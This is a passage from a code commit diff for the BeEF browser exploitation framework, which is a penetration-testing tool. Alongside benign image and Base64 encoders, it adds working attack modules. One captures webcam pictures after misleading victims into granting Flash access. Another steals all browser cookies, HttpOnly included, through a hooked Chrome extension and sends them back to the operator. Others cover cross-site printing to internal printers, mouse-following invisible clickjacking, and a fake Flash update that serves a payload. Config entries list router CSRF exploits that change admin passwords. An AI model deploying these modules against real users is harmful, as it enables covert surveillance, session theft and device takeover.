DCU = processDU(UDU, fdtbl_UV, DCU, UVDC_HT, UVAC_HT);
DCV = processDU(VDU, fdtbl_UV, DCV, UVDC_HT, UVAC_HT);
}
}
// Do the bit alignment of the EOI marker
if ( bytepos >= 0 ) {
var fillbits:BitString = new BitString();
fillbits.len = bytepos+1;
fillbits.val = (1<<(bytepos+1))-1;
writeBits(fillbits);
}
writeWord(0xFFD9); //EOI
return byteout;
}
}
}

141
modules/browser/webcam/dev/com/adobe/images/PNGEncoder.as Executable file
View File

@@ -0,0 +1,141 @@
/*
Copyright (c) 2008, Adobe Systems Incorporated
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of Adobe Systems Incorporated nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package com.adobe.images
{
import flash.geom.*;
import flash.display.Bitmap;
import flash.display.BitmapData;
import flash.utils.ByteArray;
/**
* Class that converts BitmapData into a valid PNG
*/
public class PNGEncoder
{
/**
* Created a PNG image from the specified BitmapData
*
* @param image The BitmapData that will be converted into the PNG format.
* @return a ByteArray representing the PNG encoded image data.
* @langversion ActionScript 3.0
* @playerversion Flash 9.0
* @tiptext
*/
public static function encode(img:BitmapData):ByteArray {
// Create output byte array
var png:ByteArray = new ByteArray();
// Write PNG signature
png.writeUnsignedInt(0x89504e47);
png.writeUnsignedInt(0x0D0A1A0A);
// Build IHDR chunk
var IHDR:ByteArray = new ByteArray();
IHDR.writeInt(img.width);
IHDR.writeInt(img.height);
IHDR.writeUnsignedInt(0x08060000); // 32bit RGBA
IHDR.writeByte(0);
writeChunk(png,0x49484452,IHDR);
// Build IDAT chunk
var IDAT:ByteArray= new ByteArray();
for(var i:int=0;i < img.height;i++) {
// no filter
IDAT.writeByte(0);
var p:uint;
var j:int;
if ( !img.transparent ) {
for(j=0;j < img.width;j++) {
p = img.getPixel(j,i);
IDAT.writeUnsignedInt(
uint(((p&0xFFFFFF) << 8)|0xFF));
}
} else {
for(j=0;j < img.width;j++) {
p = img.getPixel32(j,i);
IDAT.writeUnsignedInt(
uint(((p&0xFFFFFF) << 8)|
(p>>>24)));
}
}
}
IDAT.compress();
writeChunk(png,0x49444154,IDAT);
// Build IEND chunk
writeChunk(png,0x49454E44,null);
// return PNG
return png;
}
private static var crcTable:Array;
private static var crcTableComputed:Boolean = false;
private static function writeChunk(png:ByteArray,
type:uint, data:ByteArray):void {
if (!crcTableComputed) {
crcTableComputed = true;
crcTable = [];
var c:uint;
for (var n:uint = 0; n < 256; n++) {
c = n;
for (var k:uint = 0; k < 8; k++) {
if (c & 1) {
c = uint(uint(0xedb88320) ^
uint(c >>> 1));
} else {
c = uint(c >>> 1);
}
}
crcTable[n] = c;
}
}
var len:uint = 0;
if (data != null) {
len = data.length;
}
png.writeUnsignedInt(len);
var p:uint = png.position;
png.writeUnsignedInt(type);
if ( data != null ) {
png.writeBytes(data);
}
var e:uint = png.position;
png.position = p;
c = 0xffffffff;
for (var i:int = 0; i < (e-p); i++) {
c = uint(crcTable[
(c ^ png.readUnsignedByte()) &
uint(0xff)] ^ uint(c >>> 8));
}
c = uint(c^uint(0xffffffff));
png.position = e;
png.writeUnsignedInt(c);
}
}
}

106
modules/browser/webcam/dev/com/foxarc/util/Base64.as Normal file
View File

@@ -0,0 +1,106 @@
package com.foxarc.util{
import flash.utils.ByteArray;
public class Base64 {
private static const encodeChars:Array =
['A','B','C','D','E','F','G','H',
'I','J','K','L','M','N','O','P',
'Q','R','S','T','U','V','W','X',
'Y','Z','a','b','c','d','e','f',
'g','h','i','j','k','l','m','n',
'o','p','q','r','s','t','u','v',
'w','x','y','z','0','1','2','3',
'4','5','6','7','8','9','+','/'];
private static const decodeChars:Array =
[-1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, 62, -1, -1, -1, 63,
52, 53, 54, 55, 56, 57, 58, 59,
60, 61, -1, -1, -1, -1, -1, -1,
-1, 0, 1, 2, 3, 4, 5, 6,
7, 8, 9, 10, 11, 12, 13, 14,
15, 16, 17, 18, 19, 20, 21, 22,
23, 24, 25, -1, -1, -1, -1, -1,
-1, 26, 27, 28, 29, 30, 31, 32,
33, 34, 35, 36, 37, 38, 39, 40,
41, 42, 43, 44, 45, 46, 47, 48,
49, 50, 51, -1, -1, -1, -1, -1];
public static function encode(data:ByteArray):String {
var out:Array = [];
var i:int = 0;
var j:int = 0;
var r:int = data.length % 3;
var len:int = data.length - r;
var c:int;
while (i < len) {
c = data[i++] << 16 | data[i++] << 8 | data[i++];
out[j++] = encodeChars[c >> 18] + encodeChars[c >> 12 & 0x3f] + encodeChars[c >> 6 & 0x3f] + encodeChars[c & 0x3f];
}
if (r == 1) {
c = data[i++];
out[j++] = encodeChars[c >> 2] + encodeChars[(c & 0x03) << 4] + "==";
}
else if (r == 2) {
c = data[i++] << 8 | data[i++];
out[j++] = encodeChars[c >> 10] + encodeChars[c >> 4 & 0x3f] + encodeChars[(c & 0x0f) << 2] + "=";
}
return out.join('');
}
public static function decode(str:String):ByteArray {
var c1:int;
var c2:int;
var c3:int;
var c4:int;
var i:int;
var len:int;
var out:ByteArray;
len = str.length;
i = 0;
out = new ByteArray();
while (i < len) {
// c1
do {
c1 = decodeChars[str.charCodeAt(i++) & 0xff];
} while (i < len && c1 == -1);
if (c1 == -1) {
break;
}
// c2
do {
c2 = decodeChars[str.charCodeAt(i++) & 0xff];
} while (i < len && c2 == -1);
if (c2 == -1) {
break;
}
out.writeByte((c1 << 2) | ((c2 & 0x30) >> 4));
// c3
do {
c3 = str.charCodeAt(i++) & 0xff;
if (c3 == 61) {
return out;
}
c3 = decodeChars[c3];
} while (i < len && c3 == -1);
if (c3 == -1) {
break;
}
out.writeByte(((c2 & 0x0f) << 4) | ((c3 & 0x3c) >> 2));
// c4
do {
c4 = str.charCodeAt(i++) & 0xff;
if (c4 == 61) {
return out;
}
c4 = decodeChars[c4];
} while (i < len && c4 == -1);
if (c4 == -1) {
break;
}
out.writeByte(((c3 & 0x03) << 6) | c4);
}
return out;
}
}
}

BIN
modules/browser/webcam/dev/takeit.fla Normal file
View File

Binary file not shown.

63
modules/browser/webcam/module.rb Normal file
View File

@@ -0,0 +1,63 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'base64'
class Webcam < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam/takeit.swf', '/takeit', 'swf')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam/swfobject.js', '/swfobject', 'js')
end
def self.options
configuration = BeEF::Core::Configuration.instance
social_engineering_title = "This website is using Adobe Flash"
social_engineering_text = "In order to work with the programming framework this website is using, you need to allow the Adobe Flash Player Settings. If you use the new Ajax and HTML5 features in conjunction with Adobe Flash Player, it will increase your user experience."
no_of_pictures = 20
interval = 1000
return [
{'name' => 'social_engineering_title',
'description' => 'The title that is shown to the victim.',
'ui_label' => 'Social Engineering Title',
'value' => social_engineering_title,
'width' => '100px' }, {
'name' => 'social_engineering_text',
'description' => 'The social engineering text you want to show to convince the user to click the Allow button.',
'ui_label' => 'Social Engineering Text',
'value' => social_engineering_text,
'width' => '300px',
'type' => 'textarea' }, {
'name' => 'no_of_pictures',
'description' => 'The number of pictures you want to take after the victim clicked "allow".',
'ui_label' => 'Number of pictures',
'value' => no_of_pictures,
'width' => '100px' }, {
'name' => 'interval',
'description' => 'The interval in which pictures are taken.',
'ui_label' => 'Interval to take pictures (ms)',
'value' => interval,
'width' => '100px' }
]
end
def post_execute
content = {}
content["result"] = @datastore["result"] if not @datastore["result"].nil?
content["picture"] = @datastore["picture"] if not @datastore["picture"].nil?
save content
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/takeit.swf')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js')
end
end

4
modules/browser/webcam/swfobject.js Executable file
View File

File diff suppressed because one or more lines are too long

BIN
modules/browser/webcam/takeit.swf Normal file
View File

Binary file not shown.

29
modules/chrome_extensions/get_all_cookies/command.js Executable file
View File

@@ -0,0 +1,29 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
the_url = "<%== @url %>";
if (the_url != 'default_all') {
chrome.cookies.getAll({url:the_url}, function(cookies){
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'cookies: ' + JSON.stringify(cookies));
})
} else {
chrome.cookies.getAll({}, function(cookies){
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'cookies: ' + JSON.stringify(cookies));
})
}
});

26
modules/chrome_extensions/get_all_cookies/config.yaml Executable file
View File

@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
get_all_cookies:
enable: true
category: "Chrome Extensions"
name: "Get All Cookies"
description: "Steal cookies, even HttpOnly cookies, providing the hooked extension has cookies access.<br />If a URL is not specified then <em>all</em> cookies are returned (this can be a lot!)"
authors: ["mh"]
target:
working: ["C"]
not_working: ["All"]

31
modules/chrome_extensions/get_all_cookies/module.rb Executable file
View File

@@ -0,0 +1,31 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Get_all_cookies < BeEF::Core::Command
def self.options
return [
{'name' =>'url', 'ui_label'=>'Domain (e.g. http://facebook.com)', 'value' => 'default_all'}
]
end
def post_execute
content = {}
content['Return'] = @datastore['return']
save content
end
end

2
modules/exploits/camera/dlink_dcs_series_csrf/config.yaml
View File

@@ -19,7 +19,7 @@ beef:
module:
Dlink_dcs_series_csrf:
enable: true
category: ["Exploits","Camera"]
category: ["Exploits", "Camera"]
name: "Dlink DCS series CSRF"
description: "Attempts to change the password on a Dlink DCS series camera."
authors: ["bcoles"]

2
modules/exploits/router/bt_home_hub_csrf/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
bt_home_hub_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "BT Home Hub CSRF"
description: "Attempts to enable remote administration and change the tech password on a BT Home Hub wireless router."
authors: ["bcoles"]

2
modules/exploits/router/comtrend_ct5367_csrf/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
comtrend_ct5367_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "Comtrend CT-5367 CSRF"
description: "Attempts to enable remote administration and change the password on a Comtrend CT-5367 router."
authors: ["bcoles"]

2
modules/exploits/router/comtrend_ct5624_csrf/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
comtrend_ct5624_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "Comtrend CT-5624 CSRF"
description: "Attempts to enable remote administration and change the password on a Comtrend CT-5624 router."
authors: ["bcoles"]

2
modules/exploits/router/dlink_dsl500t_csrf/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
dlink_dsl500t_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "D-Link DSL500T CSRF"
description: "Attempts to change the password on a D-Link DSL500T router."
authors: ["bcoles"]

2
modules/exploits/router/huawei_smartax_mt880/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
Huawei_smartax_mt880_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "Huawei SmartAX MT880 CSRF"
description: "Attempts to add an administrator account on a Huawei SmartAX MT880 router."
authors: ["bcoles"]

2
modules/exploits/router/linksys_befsr41_csrf/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
linksys_befsr41_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "Linksys BEFSR41 CSRF"
description: "Attempts to enable remote administration and change the password on a Linksys BEFSR41 router."
authors: ["Martin Barbella"]

2
modules/exploits/router/linksys_wrt54g2_csrf/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
linksys_wrt54g2_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "Linksys WRT54G2 CSRF"
description: "Attempts to enable remote administration and change the password on a Linksys WRT54G2 router."
authors: ["Martin Barbella"]

2
modules/exploits/router/linksys_wrt54g_csrf/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
linksys_wrt54g_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "Linksys WRT54G CSRF"
description: "Attempts to enable remote administration and change the password on a Linksys WRT54G router."
authors: ["Martin Barbella"]

2
modules/exploits/switch/netgear_gs108t_csrf/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
Netgear_gs108t_csrf:
enable: true
category: ["Exploits","Switch"]
category: ["Exploits", "Switch"]
name: "Netgear GS108T CSRF"
description: "Attempts to change the password on a Netgear GS108T managed switch."
authors: ["Bart Leppens"]

69
modules/ipec/cross_site_printing/command.js Normal file
View File

@@ -0,0 +1,69 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var target_ip = "<%= @ip %>";
var target_port = "<%= @port %>";
// send a request
function send_msg(ip, port) {
// create iframe
var iframe = document.createElement("iframe");
iframe.setAttribute("id","ipc_cross_site_printing_<%= @command_id %>");
iframe.setAttribute("style", "visibility:hidden;width:1px;height:1px;");
document.body.appendChild(iframe);
iframe = document.getElementById("ipc_cross_site_printing_<%= @command_id %>");
// create form
var action = "http://" + ip + ":" + port + "/";
myform=document.createElement("form");
myform.setAttribute("name","data");
myform.setAttribute("method","post");
myform.setAttribute("enctype","multipart/form-data");
myform.setAttribute("action",action);
iframe.contentWindow.document.body.appendChild(myform);
// create message textarea
myExt = document.createElement("textarea");
myExt.setAttribute("id","msg_<%= @command_id %>");
myExt.setAttribute("name","msg_<%= @command_id %>");
myExt.setAttribute("wrap","none");
myExt.setAttribute("rows","70");
myExt.setAttribute("cols","100");
myform.appendChild(myExt);
// send message
iframe.contentWindow.document.getElementById("msg_<%= @command_id %>").value = "<%= @msg.gsub(/"/, '\\"').gsub(/\r?\n/, '\\n') %>";
myform.submit();
// clean up
setTimeout('document.body.removeChild(document.getElementById("ipc_cross_site_printing_<%= @command_id %>"));', 15000);
}
// validate target
if (!target_port || !target_ip || isNaN(target_port)) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed target host or target port');
} else if (target_port > 65535 || target_port < 0) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port');
// send request and wait for reply
} else {
send_msg(target_ip, target_port);
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Message sent');
}
});

25
modules/ipec/cross_site_printing/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
cross_site_printing:
enable: true
category: "IPEC"
name: "Cross-Site Printing (XSP)"
description: "Using Inter-protocol Exploitation/Communication (IPEC) the hooked browser will send a message to a listening print port (9100 by default) on the target specified in the 'Target Address' input field.<br /><br />The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet."
authors: ["bcoles"]
target:
working: ["FF"]

77
modules/ipec/cross_site_printing/module.rb Normal file
View File

@@ -0,0 +1,77 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Cross_site_printing < BeEF::Core::Command
def self.options
return [
{'name'=>'ip', 'ui_label' => 'Target Address', 'value' => 'localhost'},
{'name'=>'port', 'ui_label' => 'Target Port', 'value' => '9100'},
{'name'=>'msg', 'ui_label' => 'Message', 'description' => 'Message to print', 'type'=>'textarea', 'value'=>"**********************************************************************
.O,
lkOl
od cOc
'X, cOo.
cX, ,dkc.
BeEF ;Kd. ,odo,.
.dXl . .:xkl'
'OKc .;c' ,oOk:
,kKo. .cOkc. .lOk:.
.dXx. :KWKo. 'dXd.
.oXx. cXWW0c..dXd.
oW0 .OWWWNd.'KK.
....,;lkNWx KWWWWX:'XK.
,o:, .,:odkO00XNK0Okxdlc,. .KWWWWWWddWd
K::Ol .:d0NXK0OkxdoxO' .lXWWWWWWWWKW0
od d0. .l0NKOxdooooooox0. .,cdOXWWWWWWWWWWWWWx
:O ;K; ;kN0kooooooooooooK: .':ok0NWWWWWWWWWWWWWWWWWWK.
'X .Kl ;KNOdooooooooooooooXkkXWWWWWWWWWWWWWWWWWWWWWWWNd.
.N. o. .Kl 'OW0doooooooooooooodkXWWWWWWWWWWWWWWWWWWWWWWWW0l.
0l oK' .kO:';kNNkoooooooooooook0XWWWWWWWWWWWWWWWWWWWWWWWKx:.
lX.,WN: .:c:xWkoooooooooood0NWW0OWWWWWWWWWWWWWWWWWWWKo.
0O.0WWk' .XKoooooooooooONWWNo dWWWWWWWWWWWWWWWWWl
oKkNWWWX00NWXdooooooooxXWWNk' dWWWWWWWWWWWWWWWWX
.cONWWWWWWWWOoooooooONWWK:...c0WWWWWWWWWWWWWWWWWW:
.;oONWWWWxooooodKWWWWWWWWWWWWWWWWWWWWWWWWWWWWWX.
'XW0oooookNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWd
oW0ooooo0WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWO
;NXdooodKWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWx
;xkOOdooooxOO0KNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWX.
.NOoddxkkkkxxdoookKWWWWWWWWWWWWWWWWWWWWWWWWWWX'
:KNWWWWWWWWWWX0xooONWWWWWWWWWWWWWWWWWWWWWWWk.
.xNXxKWWWWWWWOXWWXxoKWWWWWWWWWWWWWWWWWWWWNk'
OWl cNWWWWWWWk oNWNxKWWWWWWWWWWWWWWWWWNOl.
,Wk xWWWWWWWWd xWWNWWWWWWWWWWWWXOdc,.
.N0 lOXNX0x; .KWWWWWWWWWWWNkc.
:NO, 'lXWWWWWWWWWNk:.
.dXN0OkxkO0NWWWWWWWWWWKl.
.';o0WWWWWWWWWWWNk;
.cxOKXKKOd;.
**********************************************************************", 'width'=>'200px' },
]
end
def post_execute
content = {}
content['result'] = @datastore['result'] if not @datastore['result'].nil?
content['fail'] = @datastore['fail'] if not @datastore['fail'].nil?
if content.empty?
content['fail'] = 'No data was returned.'
end
save content
end
end

5
modules/misc/iframe_sniffer/config.yaml
View File

@@ -19,7 +19,8 @@ beef:
enable: true
category: "Misc"
name: "iFrame Sniffer"
description: "This module attempts to do framesniffing (aka Leaky Frame). It will append leakyframe.js (written by Paul Stone) to the DOM and check for specified anchors to be present on a url.<br />For more information, refer to <a href='http://www.contextis.co.uk/research/blog/framesniffing/'>http://www.contextis.co.uk/research/blog/framesniffing/</a>"
description: "This module attempts to do framesniffing (aka Leaky Frame). It will append leakyframe.js (written by Paul Stone) to the DOM and check for specified anchors to be present on a URL.<br />For more information, refer to <a href='http://www.contextis.co.uk/research/blog/framesniffing/'>http://www.contextis.co.uk/research/blog/framesniffing/</a>"
authors: ["Bart Leppens"]
target:
working: "S"
working: ["S", "IE"]
not_working: ["ALL"]

92
modules/social_engineering/clickjacking/command.js Normal file
View File

@@ -0,0 +1,92 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var offset_top = "<%= @offset_top %>";
var offset_left = "<%= @offset_left %>";
var url = "<%= @url %>";
var debug = <%= @debug %>;
if (debug) opacity = 10; else opacity = 0;
// create container
var cjcontainer = document.createElement('div');
cjcontainer.id = "cjcontainer";
cjcontainer.setAttribute("style", "-moz-opacity:"+opacity);
cjcontainer.style.zIndex = 999;
cjcontainer.style.border = "none";
cjcontainer.style.width = "30px";
cjcontainer.style.height = "20px";
cjcontainer.style.overflow = "hidden";
cjcontainer.style.position = "absolute";
cjcontainer.style.opacity = opacity;
cjcontainer.style.filter = "alpha(opacity="+opacity+")";
cjcontainer.style.cursor = "default";
document.body.appendChild(cjcontainer);
// create iframe
var cjiframe = document.createElement('iframe');
cjiframe.id = "cjiframe";
cjiframe.src = url;
cjiframe.scrolling = "no";
cjiframe.frameBorder = "0";
cjiframe.allowTransparency = "true";
cjiframe.style.overflow = "hidden";
cjiframe.style.position = "absolute";
cjiframe.style.top = offset_top+"px";
cjiframe.style.left = offset_left+"px";
cjiframe.style.width = "200px";
cjiframe.style.height = "100px";
cjiframe.style.border = "none";
cjiframe.style.cursor = "default";
cjcontainer.appendChild(cjiframe);
// followmouse code by rsnake
// http://ha.ckers.org/weird/followmouse.html
// modified by bcoles
function followmouse(e){
var xcoord = 0;
var ycoord = 0;
var gettrailobj = function() {
if (document.getElementById)
return document.getElementById("cjcontainer").style;
else if (document.all)
return document.all.container.style;
}
if (typeof e != "undefined") {
xcoord += e.pageX - 10;
ycoord += e.pageY - 15;
} else if (typeof window.event != "undefined") {
xcoord += document.body.scrollLeft + event.clientX;
ycoord += document.body.scrollTop + event.clientY;
}
var docwidth = document.all ? document.body.scrollLeft + document.body.clientWidth : pageXOffset+window.innerWidth - 15;
var docheight = document.all ? Math.max(document.body.scrollHeight, document.body.clientHeight) : Math.max(document.body.offsetHeight, window.innerHeight)
gettrailobj().left = xcoord + "px";
gettrailobj().top = ycoord + "px";
}
// hook to mousemove event
if (window.addEventListener) {
window.addEventListener('mousemove', followmouse, false);
} else if (window.attachEvent) {
window.attachEvent('mousemove', followmouse);
}
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'clickjack=hooked mousemove event');
});

27
modules/social_engineering/clickjacking/config.yaml Normal file
View File

@@ -0,0 +1,27 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
clickjacking:
enable: true
category: "Social Engineering"
name: "Clickjacking"
description: "This module serves as a template for clickjacking attacks.<br />Simply specify the target URL and the offset (in pixels) for the iframe content. The iframe will follow the mouse cursor.<br />Debug mode creates a visible iframe for testing purposes."
authors: ["bcoles"]
target:
user_notify: ["FF", "C"]
not_working: ["IE"]

35
modules/social_engineering/clickjacking/module.rb Normal file
View File

@@ -0,0 +1,35 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Clickjacking < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/clickjack.html"
return [
{ 'name' => 'url', 'description' => 'Target URL', 'ui_label' => 'Target URL', 'value' => uri, 'width'=>'400px' },
{ 'name' => 'offset_top', 'description' => 'Offset Top (in pixels)', 'ui_label' => 'Offset Top (px)', 'value' => '-40', 'width'=>'150px' },
{ 'name' => 'offset_left', 'description' => 'Offset Left (in pixels)', 'ui_label' => 'Offset Left (px)', 'value' => '-10', 'width'=>'150px' },
{ 'name' => 'debug', 'type' => 'combobox', 'ui_label' => 'Debug Mode', 'store_type' => 'arraystore', 'store_fields' => ['debug'], 'store_data' => [['true'],['false']], 'valueField' => 'debug', 'value' => 'false', editable: false, 'displayField' => 'debug', 'mode' => 'local', 'autoWidth' => true }
]
end
def post_execute
content = {}
content['clickjack'] = @datastore['clickjack']
save content
end
end

33
modules/social_engineering/fake_flash_update/command.js Normal file
View File

@@ -0,0 +1,33 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
// Grab image and payload from config
image = "<%== @image %>";
payload = "<%== @payload %>";
// Add div to page
div = document.createElement('div');
div.setAttribute('id', 'splash');
div.setAttribute('style', 'position:absolute; top:30%; left:40%;');
div.setAttribute('align', 'center');
document.body.appendChild(div);
div.innerHTML= '<a href=\'' + payload + '\' ><img src=\''+ image +'\' /></a>';
$j("#splash").click(function () {
$j(this).hide();
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer=user has accepted');
});
});

25
modules/social_engineering/fake_flash_update/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
